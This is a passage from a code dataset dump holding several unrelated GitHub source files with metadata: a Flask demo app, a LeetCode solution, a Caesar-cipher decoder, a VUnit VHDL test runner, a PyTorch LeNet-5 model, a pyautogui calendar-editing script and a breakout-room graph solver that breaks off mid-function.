"line_number": 24, "usage_type": "attribute"}, {"api_name": "torch._inductor", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch._inductor", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch._inductor", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch._inductor", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 47, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.ops.quantized_decomposed.quantize_per_tensor", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.ops.quantized_decomposed.quantize_per_tensor", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.ops.aten._to_copy.default", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "torch.ops.aten._to_copy.default", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.div.Tensor", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.sub.Tensor", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 63, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.mul.Tensor", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.ops.aten._to_copy.default", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.div.Tensor", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.sub.Tensor", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.mul.Tensor", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.ops.aten._to_copy.default", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.add.Tensor", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 70, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.add.Tensor", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.ops.aten.clamp.default", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.ops.aten._to_copy.default", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.ops.quantized_decomposed.dequantize_per_tensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.ops", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.uint8", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torch.randn", "line_number": 79, "usage_type": "call"}, {"api_name": "torch._inductor.compile_fx.compile_fx", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.allclose", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.int32", "line_number": 99, "usage_type": "attribute"}]} +{"seq_id": "1620231330", "text": "import os\n\nfrom flask import Flask, render_template\nfrom flask.ext import assets\nfrom flask_mutatio import Mutatio\n\napp = Flask(__name__)\n\napp = Flask('test_dummy')\napp.config['DEBUG'] = True\napp.config['MUTATIO_PORT'] = 27018\napp.config['MUTATIO_TEMPLATE_TAGS'] = ('{@', '@}')\n\nenv = assets.Environment(app)\nenv.load_path = [\n os.path.join(os.path.dirname(__file__), 'static'),\n os.path.join(os.path.dirname(__file__), 'node_modules'),\n]\nenv.register(\n 'js_all',\n assets.Bundle(\n 'jquery/dist/jquery.min.js',\n 'js/bootstrap.min.js',\n assets.Bundle(\n 'coffee/dashboard.coffee',\n filters=['coffeescript']\n ),\n output='js_all.js'\n )\n)\nenv.register(\n 'css_all',\n assets.Bundle(\n 'css/bootstrap.min.css',\n 'css/font-awesome.min.css',\n output='css_all.css',\n )\n)\nmutatio = Mutatio()\nmutatio.init_app(app)\n\n@app.route('/')\ndef hello_world():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "exit99/mutatio-python", "sub_path": "demo/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.ext.assets.Environment", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.ext.assets", "line_number": 14, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.ext.assets.Bundle", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.ext.assets", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.ext.assets.Bundle", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.ext.assets", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.ext.assets.Bundle", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.ext.assets", "line_number": 33, "usage_type": "name"}, {"api_name": "flask_mutatio.Mutatio", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "37283584118", "text": "#\n# @lc app=leetcode id=2014 lang=python3\n#\n# [2014] Longest Subsequence Repeated k Times\n#\n\n# @lc code=start\nfrom collections import deque, Counter\nimport itertools\n\nclass Solution:\n def longestSubsequenceRepeatedK(self, s: str, k: int) -> str:\n\n freq = [0] * 26\n for ch in s: \n freq[ord(ch) - 97] += 1\n \n candidates = [chr(i + 97) for i, v in enumerate(freq) if v >= k]\n\n # def fn(ss):\n # i = cnt = 0\n # for ch in s:\n # if ss[i] == ch:\n # i += 1\n # if i == len(ss):\n # if (cnt := cnt + 1) == k:\n # return True\n # i = 0\n\n def fn(ss):\n t = iter(s)\n return all(c in t for c in ss * k)\n\n ans = \"\"\n queue = deque([\"\"])\n while queue:\n x = queue.popleft()\n for ch in candidates:\n xx = x + ch\n if fn(xx):\n ans = xx\n queue.append(xx)\n\n return ans\n\n # def isSubsequence(s, t):\n # t = iter(t)\n # return all(c in t for c in s)\n\n # hot = \"\".join(el * (freq // k) for el, freq in Counter(s).items()) \n\n # combs = set()\n # for i in range(len(hot) + 1):\n # for candidate in itertools.combinations(hot, i):\n # for perm in itertools.permutations(candidate):\n # combs.add(\"\".join(perm))\n\n # combs = sorted(combs, key=lambda x: (len(x), x), reverse=True)\n # for comb in combs:\n # if isSubsequence(comb * k, s):\n # return comb\n\n \n# @lc code=end\n\n", "repo_name": "chenxu0602/LeetCode", "sub_path": "2014.longest-subsequence-repeated-k-times.py", "file_name": "2014.longest-subsequence-repeated-k-times.py", "file_ext": "py", "file_size_in_byte": 1720, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "45260278868", "text": "from collections import Counter\n# message = \"Uijt jt sfbebcmf tusjoh jo Fohmjti!\"\n# message = \"Jveu lezk B9 kf kyv ivri fw kyv tzkp, givgriv wfi srtblg.\"\nmessage = \"Arire tbaan tvir lbh hc, arire tbaan yrg lbh qbja, arire tbaan eha nebhaq naq qrfreg lbh.\"\n\ndef privateEyesOnly(message):\n\tmost_common_letters = Counter(message.replace(' ', '')).most_common(1)\n\tprint(most_common_letters)\n\tfor i in range(len(most_common_letters)):\n\t\tmost_common_letters[i] = most_common_letters[i][0]\n\tmessage = message.split()\n\talphabet = []\n\tcount = 1\n\toffset = None\n\n\tfor letter in range(97, 123):\n\t\talphabet.append((chr(letter), count))\n\t\tcount += 1\n\tprint(alphabet)\n\tdef getNum(letter):\n\t\treturn [index for index in alphabet if index[0] == letter.lower()][0][1]\n\n\tdef getAl(number):\n\t\t# print(number)\n\t\treturn [index for index in alphabet if index[1] == number][0][0]\n\n\tdef decrypt(offset, message):\n\t\tmessage = list(' '.join(message))\n\t\tfor i in range(len(message)):\n\t\t\tif message[i].isalnum():\n\t\t\t\tif not message[i].isdigit():\n\t\t\t\t\tnum = getNum(message[i])\n\t\t\t\t\tnum = num - offset\n\t\t\t\t\tif num < 0:\n\t\t\t\t\t\tnum = 26 + num\n\t\t\t\t\t\n\t\t\t\t\tif message[i].istitle():\n\t\t\t\t\t\tmessage[i] = getAl(num).upper()\n\t\t\t\t\telse:\n\t\t\t\t\t\tmessage[i] = getAl(num)\n\t\t\n\t\treturn ''.join(message)\n\n\t# temp = []\n\t# [temp.append((i, len(i))) for i in message]\n\n\tfor i in message:\n\t\tif len(i) == 1:\n\t\t\tif i.istitle():\n\t\t\t\tnum = getNum(i)\n\t\t\t\toffset = num - 9\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tnum = getNum(i)\n\t\t\t\toffset = num - 1\n\t\t\t\tbreak\n\t\telif len(i) == 2:\n\t\t\tif i[1] in most_common_letters:\n\t\t\t\tprint('using o', i[1])\n\t\t\t\tnum = getNum(i[1])\n\t\t\t\toffset = num - 15\n\t\t\t\tbreak\n\t\t\telif i[0] in most_common_letters:\n\t\t\t\tprint('using i', i[0])\n\t\t\t\tnum = getNum(i[0])\n\t\t\t\toffset = num - 9\n\t\t\t\tbreak\n\t\telif len(i) == 3:\n\t\t\tif i[1] in most_common_letters:\n\t\t\t\tprint('using o', i[1])\n\t\t\t\tnum = getNum(i[1])\n\t\t\t\toffset = num - 15\n\t\t\t\tbreak\n\t\t\telif i[2] in most_common_letters:\n\t\t\t\tprint('using e', i[2])\n\t\t\t\tnum = getNum(i[2])\n\t\t\t\toffset = num - 5\n\t\t\t\tbreak\n\t\n\t\n\tprint(decrypt(offset, message))\n\n\treturn decrypt(offset, message)\n\n\t# print(Counter(message.replace(' ', '')).most_common())\n\n\n# def privateEyesOnly(message):\n# \talphabet = []\n# \tcount = 1\n# \tfor letter in range(97, 123):\n# \t\talphabet.append((chr(letter), count))\n# \t\tcount += 1\n\n# \tword = list(max(message.split(), key=len))\n# \t# print(word)\n# \tprint(alphabet)\n\n# \tfor i in range(len(word)):\n# \t\tword[i] = [index for index in alphabet if index[0] == word[i]][0][1]\n\n\n# \tfor y in range(26):\n# \t\t# del temp[:]\n# \t\ttemp = map(lambda x: x + y, word)\n# \t\ttemp = [i for i in temp]\n# \t\t# print(temp)\n# \t\tfor i in range(len(temp)):\n# \t\t\tif temp[i] < len(alphabet):\n# \t\t\t\ttemp[i] = str([index for index in alphabet if index[1] == temp[i]][0][0])\n# \t\t\telif temp[i] - len(alphabet) != 0:\n# \t\t\t\ttemp[i] = temp[i] - len(alphabet)\n# \t\t\t\ttemp[i] = str([index for index in alphabet if index[1] == temp[i]][0][0])\n# \t\t\telse:\n# \t\t\t\ttemp[i] = 'z'\n\n# \t\ttemp = ''.join(temp)\n# \t\tprint(y, temp)\n# \treturn\n\n\n\n\nprivateEyesOnly(message)\n", "repo_name": "CCecilia/codeFights", "sub_path": "challeges/privateEyesOnly.py", "file_name": "privateEyesOnly.py", "file_ext": "py", "file_size_in_byte": 3010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.Counter", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "26626430977", "text": "from pathlib import Path\nfrom itertools import product\nfrom vunit import VUnit\n\nROOT = Path(__file__).parent\n\nUI = VUnit.from_argv()\nUI.add_vhdl_builtins()\nUI.add_random()\nUI.add_verification_components()\n\nLIB = UI.library(\"vunit_lib\")\nLIB.add_source_files(ROOT / \"test\" / \"*.vhd\")\n\n\ndef encode(tb_cfg):\n return \",\".join([\"%s:%s\" % (key, str(tb_cfg[key])) for key in tb_cfg])\n\n\ndef gen_wb_tests(obj, *args):\n for dat_width, num_cycles, strobe_prob, ack_prob, stall_prob, slave_inst in product(*args):\n tb_cfg = dict(\n dat_width=dat_width,\n # TODO remove fixed addr\n adr_width=32,\n strobe_prob=strobe_prob,\n ack_prob=ack_prob,\n stall_prob=stall_prob,\n num_cycles=num_cycles,\n slave_inst=slave_inst,\n )\n config_name = encode(tb_cfg)\n obj.add_config(name=config_name, generics=dict(encoded_tb_cfg=encode(tb_cfg)))\n\n\ndef gen_avalon_tests(obj, *args):\n for data_width, num_cycles, readdatavalid_prob, waitrequest_prob in product(*args):\n tb_cfg = dict(\n data_width=data_width,\n readdatavalid_prob=readdatavalid_prob,\n waitrequest_prob=waitrequest_prob,\n num_cycles=num_cycles,\n )\n config_name = encode(tb_cfg)\n obj.add_config(name=config_name, generics=dict(encoded_tb_cfg=encode(tb_cfg)))\n\n\ndef gen_avalon_master_tests(obj, *args):\n for (\n transfers,\n readdatavalid_prob,\n waitrequest_prob,\n write_prob,\n read_prob,\n ) in product(*args):\n tb_cfg = dict(\n readdatavalid_prob=readdatavalid_prob,\n waitrequest_prob=waitrequest_prob,\n write_prob=write_prob,\n read_prob=read_prob,\n transfers=transfers,\n )\n config_name = encode(tb_cfg)\n obj.add_config(name=config_name, generics=dict(encoded_tb_cfg=encode(tb_cfg)))\n\n\ntb_avalon_slave = LIB.test_bench(\"tb_avalon_slave\")\n\nfor test in tb_avalon_slave.get_tests():\n gen_avalon_tests(test, [32], [1, 2, 64], [1.0, 0.3], [0.0, 0.4])\n\ntb_avalon_master = LIB.test_bench(\"tb_avalon_master\")\n\nfor test in tb_avalon_master.get_tests():\n if test.name == \"wr single rd single\":\n gen_avalon_master_tests(test, [1], [1.0], [0.0], [1.0], [1.0])\n else:\n gen_avalon_master_tests(test, [64], [1.0, 0.3], [0.0, 0.7], [1.0, 0.3], [1.0, 0.3])\n\nTB_WISHBONE_SLAVE = LIB.test_bench(\"tb_wishbone_slave\")\n\nfor test in TB_WISHBONE_SLAVE.get_tests():\n # TODO strobe_prob not implemented in slave tb\n gen_wb_tests(\n test,\n [8, 32],\n [1, 64],\n [1.0],\n [0.3, 1.0],\n [0.4, 0.0],\n [\n True,\n ],\n )\n\n\nTB_WISHBONE_MASTER = LIB.test_bench(\"tb_wishbone_master\")\n\nfor test in TB_WISHBONE_MASTER.get_tests():\n if test.name == \"slave comb ack\":\n gen_wb_tests(\n test,\n [32],\n [64],\n [1.0],\n [1.0],\n [0.0],\n [\n False,\n ],\n )\n else:\n gen_wb_tests(\n test,\n [8, 32],\n [1, 64],\n [0.3, 1.0],\n [0.3, 1.0],\n [0.4, 0.0],\n [\n True,\n ],\n )\n\n\nTB_AXI_STREAM = LIB.test_bench(\"tb_axi_stream\")\n\nfor id_length in [0, 8]:\n for dest_length in [0, 8]:\n for user_length in [0, 8]:\n for test in TB_AXI_STREAM.get_tests(\"*check\"):\n test.add_config(\n name=\"id_l=%d dest_l=%d user_l=%d\" % (id_length, dest_length, user_length),\n generics=dict(\n g_id_length=id_length,\n g_dest_length=dest_length,\n g_user_length=user_length,\n ),\n )\n\nTB_AXI_STREAM_PROTOCOL_CHECKER = LIB.test_bench(\"tb_axi_stream_protocol_checker\")\n\nfor data_length in [0, 8, 32]:\n for test in TB_AXI_STREAM_PROTOCOL_CHECKER.get_tests(\"*passing*tdata*\"):\n test.add_config(name=\"data_length=%d\" % data_length, generics=dict(data_length=data_length))\n\nfor test in TB_AXI_STREAM_PROTOCOL_CHECKER.get_tests(\"*failing*tid width*\"):\n test.add_config(name=\"dest_length=25\", generics=dict(dest_length=25))\n test.add_config(name=\"id_length=8 dest_length=17\", generics=dict(id_length=8, dest_length=17))\n\nTEST_FAILING_MAX_WAITS = TB_AXI_STREAM_PROTOCOL_CHECKER.test(\n \"Test failing check of that tready comes within max_waits after valid\"\n)\nfor max_waits in [0, 8]:\n TEST_FAILING_MAX_WAITS.add_config(name=\"max_waits=%d\" % max_waits, generics=dict(max_waits=max_waits))\n\nTB_AXI_STREAM.test(\"test random stall on master\").add_config(\n name=\"stall_master\", generics=dict(g_stall_percentage_master=30)\n)\n\nTB_AXI_STREAM.test(\"test random pop stall on slave\").add_config(\n name=\"stall_slave\", generics=dict(g_stall_percentage_slave=30)\n)\n\nTB_AXI_STREAM.test(\"test random check stall on slave\").add_config(\n name=\"stall_slave\", generics=dict(g_stall_percentage_slave=40)\n)\n\nUI.main()\n", "repo_name": "VUnit/vunit", "sub_path": "vunit/vhdl/verification_components/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 5078, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 651, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 5, "usage_type": "call"}, {"api_name": "vunit.VUnit.from_argv", "line_number": 7, "usage_type": "call"}, {"api_name": "vunit.VUnit", "line_number": 7, "usage_type": "name"}, {"api_name": "itertools.product", "line_number": 21, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 37, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "39723828471", "text": "\"\"\"\nThe LeNet-5 architecture:\n\n INPUT: 32 x 32\n v\n C1: 6 @ 28 x 28\n v\n S2: 6 @ 14 x 14 (sub-sampling)\n v\n C3: 16 @ 10 x 10\n v\n S4: 16 @ 5 x 5 (sub-sampling)\n v\n C5: 120 @ 1 x 1\n v\n F6: 84 Linear\n v\n OUTPUT: 10 Gaussian\n\"\"\"\n\nimport torch\nfrom torch.nn import Sequential, Module\n\n\nclass C1S2(Module):\n def __init__(self):\n super().__init__()\n self.m = Sequential(\n torch.nn.Conv2d(1, 6, kernel_size=(5, 5)), # Number of channels = number of feature maps\n torch.nn.ReLU(),\n torch.nn.AvgPool2d(kernel_size=(2, 2), stride=2)\n )\n\n def forward(self, x):\n return self.m(x)\n\n\nclass C3S4(Module):\n def __init__(self):\n super().__init__()\n self.m = Sequential(\n torch.nn.Conv2d(6, 16, kernel_size=(5, 5)),\n torch.nn.ReLU(),\n torch.nn.AvgPool2d(kernel_size=(2, 2), stride=2)\n )\n\n def forward(self, x):\n return self.m(x)\n\n\nclass C5(Module):\n def __init__(self):\n super().__init__()\n self.m = Sequential(\n torch.nn.Conv2d(16, 120, kernel_size=(5, 5)),\n torch.nn.ReLU()\n )\n\n def forward(self, x):\n return self.m(x)\n\n\nclass F6(Module):\n def __init__(self):\n super().__init__()\n self.m = Sequential(\n torch.nn.Flatten(),\n torch.nn.Linear(120, 84),\n torch.nn.ReLU(),\n )\n\n def forward(self, x):\n return self.m(x)\n\n\nclass PyLeNet5(Module):\n def __init__(self):\n super().__init__()\n self.model = Sequential(\n C1S2(),\n C3S4(),\n C5(),\n F6(),\n torch.nn.Linear(84, 10) # OUTPUT layer\n )\n\n def forward(self, x):\n return self.model(x)\n", "repo_name": "tanjeffreyz/lenet-5", "sub_path": "models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.AvgPool2d", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 51, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn.Flatten", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "attribute"}]} +{"seq_id": "23099776504", "text": "import os\nimport pyautogui as py\nimport time\nimport sys\nimport pyperclip\nimport keyboard\n\ndef click_on(picture_name, x_off=0, y_off=0):\n\timage_location = py.locateOnScreen(picture_name)\n\tif( not image_location ): \n\t\tprint(\"no image, no click\")\n\t\treturn\n\tcenter_x = image_location.left + image_location.width // 2 + x_off\n\tcenter_y = image_location.top + image_location.height // 2 + y_off\n\tprint(\"click on \", center_x, center_y)\n\tpy.leftClick(center_x, center_y)\n\n\ndef need_intervention():\n\tx, y = py.position()\n\tpy.sleep(.1)\n\tpy.hotkey('ctrl', 'a')\n\tpy.sleep(.1)\n\tpy.hotkey('ctrl', 'c')\n\tpy.sleep(.1)\n\tpage_str = pyperclip.paste()\n\tpy.sleep(.1)\n\n\tres = False\n\tif 'gateway.gostudent.org' in page_str:\n\t\tres = True\n\t\tpy.leftClick(1500, 1000)\n\t\treturn res\n\n\n\tpy.leftClick(1500, 1000)\n\tpy.sleep(.1)\n\tpy.press('escape')\n\tpy.sleep(.1)\n\tpy.moveTo(x, y)\n\treturn res\n\ndef modify_title():\n\tpy.hotkey('ctrl', 'a')\n\tpy.sleep(.1)\n\tpy.hotkey('ctrl', 'c')\n\n\tstr = pyperclip.paste()\n\n\tstr = str.split('\\n')[1]\n\n\tprint(\"l1:\", str)\n\n\tstr = str.split('/')[1]\n\n\tnames = str.split(',')\n\n\tname = names[0].strip()#[:-1]\n\tsurname = names[1].strip()\n\n\tprint(name, surname)\n\n\tupdated_name = ''\n\tif name.capitalize() == surname.capitalize():\n\t\tupdated_name = name\n\t\n\telse:\n\t\tupdated_name = name + ' ' + surname\n\t\n\tfor i in range(3): py.leftClick(170, 170) # triple click\n\n\tpyperclip.copy(updated_name)\n\n\tpy.hotkey('ctrl', 'v')\n\n\t\ndef modify_calendar():\n\tclick_on(\"cal.png\", 60)\t\n\tpy.sleep(.2)\n\tclick_on(\"Gs.png\")\n\n\n\n# py.mouseInfo()\n# exit()\n\n\n\nwhile True:\n\tpy.sleep(4)\n\tif not need_intervention():\n\t\tcontinue\n\tpy.sleep(.1)\n\tmodify_title()\n\tpy.sleep(.2)\n\tmodify_calendar()\n\tpy.sleep(.2)\n\tclick_on(\"save.png\")\n\n\n\n\n", "repo_name": "antoineMontier/Computer_control", "sub_path": "GS_Cleaner/goStudentCleaner.py", "file_name": "goStudentCleaner.py", "file_ext": "py", "file_size_in_byte": 1691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyautogui.locateOnScreen", "line_number": 9, "usage_type": "call"}, {"api_name": "pyautogui.leftClick", "line_number": 16, "usage_type": "call"}, {"api_name": "pyautogui.position", "line_number": 20, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", "line_number": 22, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 23, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", "line_number": 24, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "pyperclip.paste", "line_number": 26, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 27, "usage_type": "call"}, {"api_name": "pyautogui.leftClick", "line_number": 32, "usage_type": "call"}, {"api_name": "pyautogui.leftClick", "line_number": 36, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "pyautogui.press", "line_number": 38, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "pyautogui.moveTo", "line_number": 40, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", "line_number": 44, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", "line_number": 46, "usage_type": "call"}, {"api_name": "pyperclip.paste", "line_number": 48, "usage_type": "call"}, {"api_name": "pyautogui.leftClick", "line_number": 70, "usage_type": "call"}, {"api_name": "pyperclip.copy", "line_number": 72, "usage_type": "call"}, {"api_name": "pyautogui.hotkey", "line_number": 74, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 90, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 93, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 95, "usage_type": "call"}, {"api_name": "pyautogui.sleep", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "29914259180", "text": "import networkx as nx\nimport numpy as np\nimport random\nfrom parse import read_input_file, write_output_file, read_output_file\nfrom utils import is_valid_solution, calculate_happiness, convert_dictionary\nfrom operator import itemgetter\nimport sys\nimport glob\nimport os\nfrom os.path import basename, normpath\n\n\ndef solve(G, s):\n \"\"\"\n Args:\n G: networkx.Graph\n s: stress_budget\n Returns:\n D: Dictionary mapping for student to breakout room r e.g. {0:2, 1:0, 2:1, 3:2}\n k: Number of breakout rooms\n \"\"\"\n\n # TODO: your code here!\n best_D_so_far = {}\n best_k_so_far = 1\n best_H_so_far = 0.0\n n = nx.number_of_nodes(G)\n \n for k in range(1, n + 1):\n curr_D = {}\n smax = s/k\n G_stress = G.copy()\n while nx.number_of_nodes(G_stress) > k: \n # sort edges by decreasing happiness\n sorted_stress = sorted(G_stress.edges(data=True), key=lambda y: (y[2][\"stress\"], -y[2][\"happiness\"]), reverse=False)\n if len(sorted_stress) == 0:\n break\n #need to merge nodes A and B\n n1, n2, _ = sorted_stress[0]\n if G_stress.nodes[n1].get(\"stress\", 0) + G_stress.nodes[n2].get(\"stress\", 0) + G_stress.edges[n1, n2][\"stress\"] <= smax:\n merge(G_stress, n1, n2)\n \n else:\n G_stress.remove_edge(n1,n2)\n \n\n if nx.number_of_nodes(G_stress) == k:\n room = 0\n for node in list(G_stress.nodes):\n if isinstance(node, int):\n temp = [node]\n else:\n temp = node.split(' ')\n temp = [int(x) for x in temp]\n curr_D[room] = temp\n room += 1\n curr_D = convert_dictionary(curr_D)\n \n else:\n continue\n \n if is_valid_solution(curr_D, G, s, k):\n if calculate_happiness(curr_D, G) > best_H_so_far:\n best_D_so_far = curr_D\n best_k_so_far = k\n best_H_so_far = calculate_happiness(curr_D, G)\n #\n # pass\n return best_D_so_far, best_k_so_far\n\ndef solve_kinda(G,s,n=40):\n curMax = 0\n dMax, kMax = 0,0\n for i in range(15):\n d1, k1 = solve_happy(G,s, 0.7)\n d2, k2 = solve_stress(G,s, 0.7)\n h1 = calculate_happiness(d1, G)\n h2 = calculate_happiness(d2, G)\n if max(h1, h2) > curMax:\n if h1 > h2:\n curMax = h1\n dMax, kMax = d1, k1 \n else:\n curMax = h2 \n dMax, kMax = d2, k2\n\n for i in range(15):\n d1, k1 = solve_happy(G,s, 0.35)\n d2, k2 = 